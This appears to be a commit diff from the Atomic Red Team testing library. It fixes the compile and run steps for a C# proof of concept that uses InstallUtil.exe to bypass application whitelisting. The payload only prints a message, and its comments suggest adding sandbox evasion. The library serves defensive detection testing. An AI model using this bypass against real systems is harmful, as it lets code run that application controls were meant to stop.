security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #134 from redcanaryco/atomic-dev-cs

Browse Source 
Atomic dev cs
This commit is contained in:
Michael Haag
2018-05-07 16:21:30 -04:00
committed by GitHub
parent 63f495d984 cb7f4a7923
commit ef53daad74
2 changed files with 10 additions and 10 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Windows/Execution/InstallUtil.md
+1 -1
View File
@@ -8,7 +8,7 @@ Input:
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InastallUtilBypass.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll
## Test Script
Windows/Payloads/InstallUtilBypass.cs
+9 -9
View File
@@ -10,10 +10,10 @@ Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:InstallUtilBypass.exe InstallUtilBypass.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:InstallUtilBypass.exe /target:library InstallUtilBypass.cs
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false InstallUtilBypass.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false InstallUtilBypass.dll
*/
@@ -24,11 +24,11 @@ public class Program
{
Console.WriteLine("Hey There From Main()");
//Add any behaviour here to throw off sandbox execution/analysts :)
//These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked
//These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked
//by InstallUtil.exe
}
}
[System.ComponentModel.RunInstaller(true)]
@@ -37,9 +37,9 @@ public class Sample : System.Configuration.Install.Installer
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
public override void Uninstall(System.Collections.IDictionary savedState)
{
Console.WriteLine("Hello There From Uninstall, If you are reading this, prevention has failed.");
Console.WriteLine(@"Hello There From Uninstall, If you are reading this, prevention has failed.\n");
}
}